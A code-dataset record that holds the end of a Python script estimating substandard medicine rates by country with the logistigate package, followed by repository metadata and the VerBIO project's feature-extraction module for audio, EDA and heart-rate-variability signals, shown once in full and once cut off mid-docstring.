midpoints = [outUppers[i] - (outUppers[i] - outLowers[i]) / 2 for i in range(len(outUppers))]
zippedList = zip(midpoints, outUppers, outLowers, outNames)
sorted_pairs = sorted(zippedList, reverse=True)
outNamesSorted = [tup[3] for tup in sorted_pairs]
outNamesSorted.append('')
outNamesSorted.append('(Prior)')
# Plot
fig, (ax) = plt.subplots(figsize=(8, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='purple')
plt.plot((outNamesSorted[-1], outNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(outNamesSorted)), outNamesSorted, rotation=90)
plt.title('Regional Aggregates - ' + intStr + '% Intervals' + '\nGhana Antimalarials',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Regional Aggregate', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(11)
fig.tight_layout()
plt.show()
plt.close()
util.Summarize(logistigateDict_GHA_antimalarial)
# Run with Kenya provinces
dataTblDict_KEN = util.testresultsfiletotable('MQDfiles/MQD_KENYA.csv')
countryMean = np.sum(dataTblDict_KEN['Y']) / np.sum(dataTblDict_KEN['N'])
dataTblDict_KEN.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_KEN = lg.runlogistigate(dataTblDict_KEN)
util.plotPostSamples(logistigateDict_KEN)
util.printEstimates(logistigateDict_KEN)
# Run with Laos provinces
dataTblDict_LAO = util.testresultsfiletotable('MQDfiles/MQD_LAOS.csv')
countryMean = np.sum(dataTblDict_LAO['Y']) / np.sum(dataTblDict_LAO['N'])
dataTblDict_LAO.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_LAO = lg.runlogistigate(dataTblDict_LAO)
util.plotPostSamples(logistigateDict_LAO)
util.printEstimates(logistigateDict_LAO)
# Run with Mozambique provinces
dataTblDict_MOZ = util.testresultsfiletotable('MQDfiles/MQD_MOZAMBIQUE.csv')
countryMean = np.sum(dataTblDict_MOZ['Y']) / np.sum(dataTblDict_MOZ['N'])
dataTblDict_MOZ.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_MOZ = lg.runlogistigate(dataTblDict_MOZ)
util.plotPostSamples(logistigateDict_MOZ)
util.printEstimates(logistigateDict_MOZ)
# Run with Nigeria provinces
dataTblDict_NIG = util.testresultsfiletotable('MQDfiles/MQD_NIGERIA.csv')
countryMean = np.sum(dataTblDict_NIG['Y']) / np.sum(dataTblDict_NIG['N'])
dataTblDict_NIG.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_NIG = lg.runlogistigate(dataTblDict_NIG)
util.plotPostSamples(logistigateDict_NIG)
util.printEstimates(logistigateDict_NIG)
# Run with Peru provinces
dataTblDict_PER = util.testresultsfiletotable('MQDfiles/MQD_PERU.csv')
countryMean = np.sum(dataTblDict_PER['Y']) / np.sum(dataTblDict_PER['N'])
dataTblDict_PER.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PER = lg.runlogistigate(dataTblDict_PER)
numPeruImps_half = int(np.floor(logistigateDict_PER['importerNum']/2))
util.plotPostSamples(logistigateDict_PER, plotType='int90',
importerIndsSubset=np.arange(0,numPeruImps_half).tolist(), subTitleStr=['\nPeru - 1st Half', '\nPeru'])
util.plotPostSamples(logistigateDict_PER, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half,logistigateDict_PER['importerNum']).tolist(),
subTitleStr=['\nPeru - 2nd Half', '\nPeru'])
util.printEstimates(logistigateDict_PER)
# Plot importers subset where median sample is above 0.4
totalEntities = logistigateDict_PER['importerNum'] + logistigateDict_PER['outletNum']
sampMedians = [np.median(logistigateDict_PER['postSamples'][:, i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_PER['importerNum']]) if x > 0.4]
highImporterInds = [highImporterInds[i] for i in [3,6,7,8,9,12,13,16]] # Only manufacturers with more than 1 sample
highOutletInds = [i for i, x in enumerate(sampMedians[logistigateDict_PER['importerNum']:]) if x > 0.12]
util.plotPostSamples(logistigateDict_PER, importerIndsSubset=highImporterInds,
outletIndsSubset=highOutletInds,
subTitleStr=['\nPeru - Subset', '\nPeru - Subset'])
util.printEstimates(logistigateDict_PER, importerIndsSubset=highImporterInds, outletIndsSubset=highOutletInds)
# Run with Peru provinces filtered for outlet-type samples
dataTblDict_PER_filt = util.testresultsfiletotable('MQDfiles/MQD_PERU_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_PER_filt['Y']) / np.sum(dataTblDict_PER_filt['N'])
dataTblDict_PER_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PER_filt = lg.runlogistigate(dataTblDict_PER_filt)
numPeruImps_half = int(np.floor(logistigateDict_PER_filt['importerNum'] / 2))
util.plotPostSamples(logistigateDict_PER_filt, plotType='int90',
importerIndsSubset=np.arange(0, numPeruImps_half).tolist(),
subTitleStr=['\nPeru - 1st Half (filtered)', '\nPeru (filtered)'])
util.plotPostSamples(logistigateDict_PER_filt, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half, logistigateDict_PER_filt['importerNum']).tolist(),
subTitleStr=['\nPeru - 2nd Half (filtered)', '\nPeru (filtered)'])
util.printEstimates(logistigateDict_PER_filt)
# Run with Peru provinces filtered for antibiotics
dataTblDict_PER_antibiotics = util.testresultsfiletotable('MQDfiles/MQD_PERU_ANTIBIOTIC.csv')
countryMean = np.sum(dataTblDict_PER_antibiotics['Y']) / np.sum(dataTblDict_PER_antibiotics['N'])
dataTblDict_PER_antibiotics.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PER_antibiotics = lg.runlogistigate(dataTblDict_PER_antibiotics)
numPeruImps_half = int(np.floor(logistigateDict_PER_antibiotics['importerNum'] / 2))
util.plotPostSamples(logistigateDict_PER_antibiotics, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half).tolist(),
subTitleStr=['\nPeru - 1st Half (Antibiotics)', '\nPeru (Antibiotics)'])
util.plotPostSamples(logistigateDict_PER_antibiotics, plotType='int90',
importerIndsSubset=np.arange(numPeruImps_half, logistigateDict_PER_antibiotics['importerNum']).tolist(),
subTitleStr=['\nPeru - 2nd Half (Antibiotics)', '\nPeru (Antibiotics)'])
util.printEstimates(logistigateDict_PER_antibiotics)
# Run with Philippines provinces
dataTblDict_PHI = util.testresultsfiletotable(dataDict['dataTbl_PHI'], csvName=False)
#dataTblDict_PHI = util.testresultsfiletotable('MQDfiles/MQD_PHILIPPINES.csv')
countryMean = np.sum(dataTblDict_PHI['Y']) / np.sum(dataTblDict_PHI['N'])
dataTblDict_PHI.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PHI = lg.runlogistigate(dataTblDict_PHI)
util.plotPostSamples(logistigateDict_PHI,plotType='int90',subTitleStr=['\nPhilippines','\nPhilippines'])
util.printEstimates(logistigateDict_PHI)
# Plot importers subset where median sample is above 0.1
totalEntities = logistigateDict_PHI['importerNum'] + logistigateDict_PHI['outletNum']
sampMedians = [np.median(logistigateDict_PHI['postSamples'][:, i]) for i in range(totalEntities)]
highImporterInds = [i for i, x in enumerate(sampMedians[:logistigateDict_PHI['importerNum']]) if x > 0.1]
#highImporterInds = [highImporterInds[i] for i in
# [3, 6, 7, 8, 9, 12, 13, 16]] # Only manufacturers with more than 1 sample
highOutletInds = [i for i, x in enumerate(sampMedians[logistigateDict_PHI['importerNum']:]) if x > 0.1]
#util.plotPostSamples(logistigateDict_PHI, importerIndsSubset=highImporterInds,
# outletIndsSubset=highOutletInds,
# subTitleStr=['\nPhilippines - Subset', '\nPhilippines - Subset'])
# Special plotting for these data sets
numImp, numOut = logistigateDict_PHI['importerNum'], logistigateDict_PHI['outletNum']
lowerQuant, upperQuant = 0.05, 0.95
intStr = '90'
priorSamps = logistigateDict_PHI['prior'].expitrand(5000)
priorLower, priorUpper = np.quantile(priorSamps, lowerQuant), np.quantile(priorSamps, upperQuant)
importerIndsSubset = range(numImp)
impNames = [logistigateDict_PHI['importerNames'][i] for i in importerIndsSubset]
impLowers = [np.quantile(logistigateDict_PHI['postSamples'][:, l], lowerQuant) for l in
importerIndsSubset]
impUppers = [np.quantile(logistigateDict_PHI['postSamples'][:, l], upperQuant) for l in
importerIndsSubset]
midpoints = [impUppers[i] - (impUppers[i] - impLowers[i]) / 2 for i in range(len(impUppers))]
zippedList = zip(midpoints, impUppers, impLowers, impNames)
sorted_pairs = sorted(zippedList, reverse=True)
impNamesSorted = [tup[3] for tup in sorted_pairs]
impNamesSorted.append('')
impNamesSorted.append('(Prior)')
# Plot
import matplotlib.pyplot as plt
fig, (ax) = plt.subplots(figsize=(10, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='red')
plt.plot((impNamesSorted[-1], impNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(impNamesSorted)), impNamesSorted, rotation=90)
plt.title('Manufacturers - ' + intStr + '% Intervals' + '\nPhilippines Anti-tuberculosis Medicines',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Manufacturer Name', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(9)
fig.tight_layout()
plt.show()
plt.close()
outletIndsSubset = range(numOut)
outNames = [logistigateDict_PHI['outletNames'][i] for i in outletIndsSubset]
outLowers = [np.quantile(logistigateDict_PHI['postSamples'][:, numImp + l], lowerQuant) for l in
outletIndsSubset]
outUppers = [np.quantile(logistigateDict_PHI['postSamples'][:, numImp + l], upperQuant) for l in
outletIndsSubset]
midpoints = [outUppers[i] - (outUppers[i] - outLowers[i]) / 2 for i in range(len(outUppers))]
zippedList = zip(midpoints, outUppers, outLowers, outNames)
sorted_pairs = sorted(zippedList, reverse=True)
outNamesSorted = [tup[3] for tup in sorted_pairs]
outNamesSorted.append('')
outNamesSorted.append('(Prior)')
# Plot
fig, (ax) = plt.subplots(figsize=(8, 10), ncols=1)
sorted_pairs.append((np.nan, np.nan, np.nan, ' ')) # for spacing
for _, upper, lower, name in sorted_pairs:
plt.plot((name, name), (lower, upper), 'o-', color='purple')
plt.plot((outNamesSorted[-1], outNamesSorted[-1]), (priorLower, priorUpper), 'o--', color='gray')
plt.ylim([0, 1])
plt.xticks(range(len(outNamesSorted)), outNamesSorted, rotation=90)
plt.title('Regional Aggregates - ' + intStr + '% Intervals' + '\nPhilippines Anti-tuberculosis Medicines',
fontdict={'fontsize': 18, 'fontname': 'Trebuchet MS'})
plt.xlabel('Regional Aggregate', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
plt.ylabel('Interval value', fontdict={'fontsize': 14, 'fontname': 'Trebuchet MS'})
for label in (ax.get_xticklabels() + ax.get_yticklabels()):
label.set_fontname('Times New Roman')
label.set_fontsize(11)
fig.tight_layout()
plt.show()
plt.close()
util.Summarize(logistigateDict_PHI)
util.printEstimates(logistigateDict_PHI, importerIndsSubset=highImporterInds, outletIndsSubset=highOutletInds)
# Run with Philippines provinces filtered for outlet-type samples
dataTblDict_PHI_filt = util.testresultsfiletotable('MQDfiles/MQD_PHILIPPINES_FACILITYFILTER.csv')
countryMean = np.sum(dataTblDict_PHI_filt['Y']) / np.sum(dataTblDict_PHI_filt['N'])
dataTblDict_PHI_filt.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 1000,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_PHI_filt = lg.runlogistigate(dataTblDict_PHI_filt)
util.plotPostSamples(logistigateDict_PHI_filt, plotType='int90', subTitleStr=['\nPhilippines (filtered)', '\nPhilippines (filtered)'])
util.printEstimates(logistigateDict_PHI_filt)
# Run with Thailand provinces
dataTblDict_THA = util.testresultsfiletotable('MQDfiles/MQD_THAILAND.csv')
countryMean = np.sum(dataTblDict_THA['Y']) / np.sum(dataTblDict_THA['N'])
dataTblDict_THA.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_THA = lg.runlogistigate(dataTblDict_THA)
util.plotPostSamples(logistigateDict_THA)
util.printEstimates(logistigateDict_THA)
# Run with Viet Nam provinces
dataTblDict_VIE = util.testresultsfiletotable('MQDfiles/MQD_VIETNAM.csv')
countryMean = np.sum(dataTblDict_VIE['Y']) / np.sum(dataTblDict_VIE['N'])
dataTblDict_VIE.update({'diagSens': 1.0,
'diagSpec': 1.0,
'numPostSamples': 500,
'prior': methods.prior_normal(mu=sps.logit(countryMean)),
'MCMCdict': MCMCdict})
logistigateDict_VIE = lg.runlogistigate(dataTblDict_VIE)
util.plotPostSamples(logistigateDict_VIE)
util.printEstimates(logistigateDict_VIE)
return
| 0 | 0 | 0 |
d14a481f2aa7e34b8789d4a5d6edd496c4c171c8 | 11,376 | py | Python | src/old-verbio/features.py | jasondraether/verbio | 0db543ebdee05e5cc24556d2239b7eaf215361a2 | [
"MIT"
] | null | null | null | src/old-verbio/features.py | jasondraether/verbio | 0db543ebdee05e5cc24556d2239b7eaf215361a2 | [
"MIT"
] | null | null | null | src/old-verbio/features.py | jasondraether/verbio | 0db543ebdee05e5cc24556d2239b7eaf215361a2 | [
"MIT"
] | null | null | null | """Feature extraction code for the VerBIO project
"""
import pandas as pd
import numpy as np
from scipy import stats
import opensmile
from scipy.io import wavfile
import preprocessing
import neurokit2 as nk
import scipy
import math
def get_df_gradient(df, feature_keys):
"""Given a list of keys for a dataframe, takes the gradient of those features and adds it to a new
column with '_grad' appended to the original key name.
Parameters
----------
df : Pandas dataframe
Dataframe that has columns in feature_keys
feature_keys : list[str]
Keys in the dataframe we want to take the gradient of
Returns
-------
df : Pandas dataframe
Modified Dataframe with new gradient keys
grad_keys : list[str]
New keys added with '_grad' appended to it
"""
grad_keys = []
for key in feature_keys:
new_key = key+'_grad'
df[new_key] = np.gradient(df[key].to_numpy, axis=0, dtype='float64')
grad_keys.append(new_key)
return df, grad_keys
def format_extracted_features(df, target_keys=[], time_key='', repair_fns={}, shift_fn=None, lookback_fn=None, sampling_fn=None):
"""Summary
Parameters
----------
df : Pandas dataframe
Dataframe that holds our features, does NOT contain the outcome (i.e., only 'X', not 'y')
target_keys : list[str], optional
Keep only 'target_keys' and drop the rest. If empty (or not specified), then keep all columns
time_key : str, optional
If there is a time key in the dataframe that needs to be dropped, then specify it. Otherwise
we assume there is no time key in the dataframe
repair_fns : list, optional
A dictionary of lambda functions, where the key to the function is the key
in the dataframe that we repair. By default, every key is eventually repaired
with interpolation
shift_fn : None, optional
An optional lambda function to shift the data back or forward in time
sampling_fn : None, optional
An optional lambda function to upsample or downsample the data
Returns
-------
df : Pandas dataframe
The prepared dataframe for training
"""
if len(target_keys) > 0:
kept_keys = set()
kept_keys.update(target_keys)
if time_key != '': kept_keys.add(time_key)
for key in df.columns:
if key not in kept_keys: df.drop(columns=key, inplace=True)
if len(repair_fns) > 0:
for key in repair_fns.keys():
df[key] = repair_fns[key](df[key])
# Regardless of repair functions, every column needs to be repaired just in case
df = preprocessing.repair_dataframe(df, 'inter')
# Shift, remove time key, then resample (this is correct, see on paper)
# TODO: Support multiple shift functions
if shift_fn != None: df = shift_fn(df)
if time_key != None and time_key in df.columns: df = df.drop(columns=time_key)
# Lookback happens here
if lookback_fn != None: df = lookback_fn(df)
# TODO: Support multiple sampling functions
if sampling_fn != None: df = sampling_fn(df)
return df
def format_annotation(df, window_size=1, stride=1, window_fn=lambda x: np.mean(x, axis=0), threshold=None, time_key='', target_keys=[]):
"""Prepare the annotation features to be used for training.
Parameters
----------
df : Pandas dataframe
Dataframe containing annotations of anxiety levels
window_size : float
Length of the window in seconds to apply to the annotations
stride : float
Stride of the window in seconds to apply to the annotations
window_fn : function, optional
Optional window function to be apply to the annotations. Default to mean
threshold : int, optional
Threshold to binarize the data. If annotation < threshold, 0, otherwise 1
time_key : str, optional
If there is a time key in the dataframe that needs to be dropped, then specify it. Otherwise
we assume there is no time key in the dataframe
target_keys : list, optional
Keep only 'target_keys' and drop the rest. If empty (or not specified), then keep all columns
Returns
-------
df : Pandas dataframe
The prepared dataframe for training
"""
# TODO: Allow to combine annotators
if target_keys != None:
kept_keys = set()
kept_keys.update(target_keys)
if time_key != None:
kept_keys.add(time_key)
for key in df.columns:
if key not in kept_keys: df.drop(columns=key, inplace=True)
df = preprocessing.repair_dataframe(df, 'inter')
df = preprocessing.window_dataframe(df, time_key, window_size, stride, window_fn)
if threshold != None: df = preprocessing.binarize_dataframe(df, threshold, target_keys)
if time_key != '' and time_key in df.columns: df = df.drop(columns=time_key)
return df
def get_audio_features(signal, sr, frame_length, frame_skip, feature_set='eGeMAPSv02', feature_level='LLDs'):
"""Extract ComParE16 features using the OpenSMILE toolkit
Parameters
----------
signal : ndarray
Array of signal data from audio file
sr : int
Sampling rate of audio
frame_length : float
Time in seconds of window during extraction
frame_skip : float
Stride in seconds of window during windowing
times : ndarray, optional
Used to make this broadcastable (unused since times are inferred)
time_key : str, optional
Optional time key to include for a time axis in the new dataframe.
Default to 'Time (s)'. The time is assumed to start at 0 and
is inferred from the sampling rate
Returns
-------
df : Pandas dataframe
Dataframe with the ComParE16 features with a time axis specified by time_key
"""
# Times are inferred!
n_samples = signal.shape[0]
# Frame length and frame skip in samples
samples_per_frame = int(sr*frame_length)
samples_per_skip = int(sr*frame_skip)
# For functionals: OpenSMILE does the windowing for you
# For LLD's: OpenSMILE does NOT window for you. It does leave windows, but those are just from the extractor
if feature_set == 'eGeMAPSv02': feature_set_param = opensmile.FeatureSet.eGeMAPSv02
elif feature_set == 'ComParE16': feature_set_param = opensmile.FeatureSet.ComParE_2016
else: raise ValueError(f'Unrecognized feature_set {feature_set}')
if feature_level == 'LLDs': feature_level_param = opensmile.FeatureLevel.LowLevelDescriptors
elif feature_level == 'Functionals': feature_level_param = opensmile.FeatureLevel.Functionals
else: raise ValueError(f'Unrecognized feature_level {feature_level}')
smile = opensmile.Smile(feature_set=feature_set_param, feature_level=feature_level_param)
windowed_dfs = preprocessing.window_array(
signal,
samples_per_frame,
samples_per_skip,
lambda x: smile.process_signal(x, sr),
)
if feature_level == 'LLDs':
# Since OpenSmile doesn't window for us, we just do it here by taking the mean
for i, df in enumerate(windowed_dfs):
df = df.reset_index(drop=True).astype('float64')
windowed_dfs[i] = df.mean(axis=0).to_frame().T
n_windows = len(windowed_dfs) # sketchy...
start_times = np.arange(0.0, (frame_skip*n_windows), frame_skip)
end_times = np.arange(frame_length, (frame_skip*n_windows)+frame_length, frame_skip)
df = pd.concat(windowed_dfs, axis=0)
df['t0'] = start_times
df['tn'] = end_times
# Just to be safe..
df = df.sort_values(by=['t0']).reset_index(drop=True)
return df
def get_EDA_features(signal, sr, frame_length, frame_skip, times):
"""Summary
Parameters
----------
signal : ndarray
Array of EDA data
sr : int
Sampling rate of EDA data
times : ndarray
Timestamps of each EDA sample TODO: Allow this to be inferred from sr
frame_length : float
Windowing length for data in seconds
frame_skip : float
Window stride for data in seconds
time_key : str, optional
Optional time key to include for a time axis in the new dataframe.
Default to 'Time (s)'. The time is assumed to start at 0 and
is inferred from the sampling rate
Returns
-------
df : Pandas dataframe
Windowed EDA features
"""
# TODO: Not sure if we should window the samples, then extract
# or extract, then window samples. My guess is it doesn't matter!
order = 4
w0 = 1.5 # Cutoff frequency for Butterworth (should I remove?)
w0 = 2 * np.array(w0) / sr
signal = nk.signal_sanitize(signal)
b, a = scipy.signal.butter(N=order, Wn=w0, btype='lowpass', analog=False, output='ba')
filtered = scipy.signal.filtfilt(b, a, signal)
signal_clean = nk.signal_smooth(filtered, method='convolution', kernel='blackman', size=48)
signal_decomp = nk.eda_phasic(signal_clean, sampling_rate=sr)
signal_peak, info = nk.eda_peaks(
signal_decomp['EDA_Phasic'].values,
sampling_rate=sr,
method='biosppy',
amplitude_min=0.1
)
# Only window nonzero amplitudes
df = pd.DataFrame({
'SCL': preprocessing.window_timed_array(times, signal_decomp['EDA_Tonic'].to_numpy(), frame_length, frame_skip),
'SCR_Amplitude': preprocessing.window_timed_array(times, signal_peak['SCR_Amplitude'].to_numpy(), frame_length, frame_skip, lambda x: np.mean(x[np.nonzero(x)]) if len(np.nonzero(x)[0]) > 0 else 0),
'SCR_Onsets': preprocessing.window_timed_array(times, signal_peak['SCR_Onsets'].to_numpy(), frame_length, frame_skip, lambda x: np.sum(x)),
'SCR_Peaks': preprocessing.window_timed_array(times, signal_peak['SCR_Peaks'].to_numpy(), frame_length, frame_skip, lambda x: np.sum(x)),
}) # Meh, recoverytime isn't really useful
start_times = np.arange(0.0, (frame_skip*(len(df.index))), frame_skip)
end_times = np.arange(frame_length, (frame_skip*(len(df.index)))+frame_length, frame_skip)
df['t0'] = start_times
df['tn'] = end_times
# Just to be safe..
df = df.sort_values(by=['t0']).reset_index(drop=True)
return df
def get_HRV_features(signal, sr, frame_length, frame_skip, times):
"""Extract HRV time-series features using BVP (PPG) or ECG data.
Extraction is done in a similar way as ComParE16.
# TODO: We could also just use IBI instead of finding peaks?
Parameters
----------
signal : ndarray
Array of BVP (PPG) or ECG data
sr : int
Sampling rate of BVP or ECG data
times : ndarray
Timestamps of each BVP/ECG sample TODO: Allow this to be inferred from sr
frame_length : float
Windowing length for data in seconds
frame_skip : float
Window stride for data in seconds
time_key : str, optional
Optional time key to include for a time axis in the new dataframe.
Default to 'Time (s)'. The time is assumed to start at 0 and
is inferred from the sampling rate
"""
# Unfortunately, we can't get good enough time series data unless
# BVP is at least 4 seconds in duration
assert frame_length >= 4.0 or math.isclose(frame_length, 4.0)
time_slices = preprocessing.get_window_slices(times, frame_length, frame_skip)
n_slices = len(time_slices)
feature_dfs = [None for _ in range(n_slices)]
for i in range(n_slices):
frame = signal[time_slices[i][0]:time_slices[i][1]+1]
frame_clean = nk.ppg_clean(frame, sampling_rate=sr)
info = nk.ppg_findpeaks(frame_clean, sampling_rate=sr)
if frame_length >= 30.0 or math.isclose(frame_length, 30.0): # Minimum required window for accurate freq + nonlinear features
feature_df = nk.hrv(info['PPG_Peaks'], sampling_rate=sr)
else:
feature_df = nk.hrv_time(info['PPG_Peaks'], sampling_rate=sr)
feature_df['t0'] = [i*frame_skip]
feature_df['tn'] = [(i*frame_skip)+frame_length]
feature_dfs[i] = feature_df
df = pd.concat(feature_dfs, axis=0)
df = df.sort_values(by=['t0']).reset_index(drop=True)
return df
| 34.788991 | 199 | 0.727233 | """Feature extraction code for the VerBIO project
"""
import pandas as pd
import numpy as np
from scipy import stats
import opensmile
from scipy.io import wavfile
import preprocessing
import neurokit2 as nk
import scipy
import math
def get_df_gradient(df, feature_keys):
"""Given a list of keys for a dataframe, takes the gradient of those features and adds it to a new
column with '_grad' appended to the original key name.
Parameters
----------
df : Pandas dataframe
Dataframe that has columns in feature_keys
feature_keys : list[str]
Keys in the dataframe we want to take the gradient of
Returns
-------
df : Pandas dataframe
Modified Dataframe with new gradient keys
grad_keys : list[str]
New keys added with '_grad' appended to it
"""
grad_keys = []
for key in feature_keys:
new_key = key+'_grad'
df[new_key] = np.gradient(df[key].to_numpy, axis=0, dtype='float64')
grad_keys.append(new_key)
return df, grad_keys
def format_extracted_features(df, target_keys=[], time_key='', repair_fns={}, shift_fn=None, lookback_fn=None, sampling_fn=None):
"""Summary
Parameters
----------
df : Pandas dataframe
Dataframe that holds our features, does NOT contain the outcome (i.e., only 'X', not 'y')
target_keys : list[str], optional
Keep only 'target_keys' and drop the rest. If empty (or not specified), then keep all columns
time_key : str, optional
If there is a time key in the dataframe that needs to be dropped, then specify it. Otherwise
we assume there is no time key in the dataframe
repair_fns : list, optional
A dictionary of lambda functions, where the key to the function is the key
in the dataframe that we repair. By default, every key is eventually repaired
with interpolation
shift_fn : None, optional
An optional lambda function to shift the data back or forward in time
sampling_fn : None, optional
An optional lambda function to upsample or downsample the data
Returns
-------
df : Pandas dataframe
The prepared dataframe for training
"""
if len(target_keys) > 0:
kept_keys = set()
kept_keys.update(target_keys)
if time_key != '': kept_keys.add(time_key)
for key in df.columns:
if key not in kept_keys: df.drop(columns=key, inplace=True)
if len(repair_fns) > 0:
for key in repair_fns.keys():
df[key] = repair_fns[key](df[key])
# Regardless of repair functions, every column needs to be repaired just in case
df = preprocessing.repair_dataframe(df, 'inter')
# Shift, remove time key, then resample (this is correct, see on paper)
# TODO: Support multiple shift functions
if shift_fn != None: df = shift_fn(df)
if time_key != None and time_key in df.columns: df = df.drop(columns=time_key)
# Lookback happens here
if lookback_fn != None: df = lookback_fn(df)
# TODO: Support multiple sampling functions
if sampling_fn != None: df = sampling_fn(df)
return df
def format_annotation(df, window_size=1, stride=1, window_fn=lambda x: np.mean(x, axis=0), threshold=None, time_key='', target_keys=[]):
"""Prepare the annotation features to be used for training.
Parameters
----------
df : Pandas dataframe
Dataframe containing annotations of anxiety levels
window_size : float
Length of the window in seconds to apply to the annotations
stride : float
Stride of the window in seconds to apply to the annotations
window_fn : function, optional
Optional window function to be apply to the annotations. Default to mean
threshold : int, optional
Threshold to binarize the data. If annotation < threshold, 0, otherwise 1
time_key : str, optional
If there is a time key in the dataframe that needs to be dropped, then specify it. Otherwise
we assume there is no time key in the dataframe
target_keys : list, optional
Keep only 'target_keys' and drop the rest. If empty (or not specified), then keep all columns
Returns
-------
df : Pandas dataframe
The prepared dataframe for training
"""
# TODO: Allow to combine annotators
if target_keys != None:
kept_keys = set()
kept_keys.update(target_keys)
if time_key != None:
kept_keys.add(time_key)
for key in df.columns:
if key not in kept_keys: df.drop(columns=key, inplace=True)
df = preprocessing.repair_dataframe(df, 'inter')
df = preprocessing.window_dataframe(df, time_key, window_size, stride, window_fn)
if threshold != None: df = preprocessing.binarize_dataframe(df, threshold, target_keys)
if time_key != '' and time_key in df.columns: df = df.drop(columns=time_key)
return df
def get_audio_features(signal, sr, frame_length, frame_skip, feature_set='eGeMAPSv02', feature_level='LLDs'):
"""Extract ComParE16 features using the OpenSMILE toolkit
Parameters
----------
signal : ndarray
Array of signal data from audio file
sr : int
Sampling rate of audio
frame_length : float
Time in seconds of window during extraction
frame_skip : float
Stride in seconds of window during windowing
times : ndarray, optional
Used to make this broadcastable (unused since times are inferred)
time_key : str, optional
Optional time key to include for a time axis in the new dataframe.
Default to 'Time (s)'. The time is assumed to start at 0 and
is inferred from the sampling rate
Returns
-------
df : Pandas dataframe
Dataframe with the ComParE16 features with a time axis specified by time_key
"""
# Times are inferred!
n_samples = signal.shape[0]
# Frame length and frame skip in samples
samples_per_frame = int(sr*frame_length)
samples_per_skip = int(sr*frame_skip)
# For functionals: OpenSMILE does the windowing for you
# For LLD's: OpenSMILE does NOT window for you. It does leave windows, but those are just from the extractor
if feature_set == 'eGeMAPSv02': feature_set_param = opensmile.FeatureSet.eGeMAPSv02
elif feature_set == 'ComParE16': feature_set_param = opensmile.FeatureSet.ComParE_2016
else: raise ValueError(f'Unrecognized feature_set {feature_set}')
if feature_level == 'LLDs': feature_level_param = opensmile.FeatureLevel.LowLevelDescriptors
elif feature_level == 'Functionals': feature_level_param = opensmile.FeatureLevel.Functionals
else: raise ValueError(f'Unrecognized feature_level {feature_level}')
smile = opensmile.Smile(feature_set=feature_set_param, feature_level=feature_level_param)
windowed_dfs = preprocessing.window_array(
signal,
samples_per_frame,
samples_per_skip,
lambda x: smile.process_signal(x, sr),
)
if feature_level == 'LLDs':
# Since OpenSmile doesn't window for us, we just do it here by taking the mean
for i, df in enumerate(windowed_dfs):
df = df.reset_index(drop=True).astype('float64')
windowed_dfs[i] = df.mean(axis=0).to_frame().T
n_windows = len(windowed_dfs) # sketchy...
start_times = np.arange(0.0, (frame_skip*n_windows), frame_skip)
end_times = np.arange(frame_length, (frame_skip*n_windows)+frame_length, frame_skip)
df = pd.concat(windowed_dfs, axis=0)
df['t0'] = start_times
df['tn'] = end_times
# Just to be safe..
df = df.sort_values(by=['t0']).reset_index(drop=True)
return df
def get_EDA_features(signal, sr, frame_length, frame_skip, times):
"""Summary
Parameters
----------
signal : ndarray
Array of EDA data
sr : int
Sampling rate of EDA data
times : ndarray
Timestamps of each EDA sample TODO: Allow this to be inferred from sr
frame_length : float
Windowing length for data in seconds
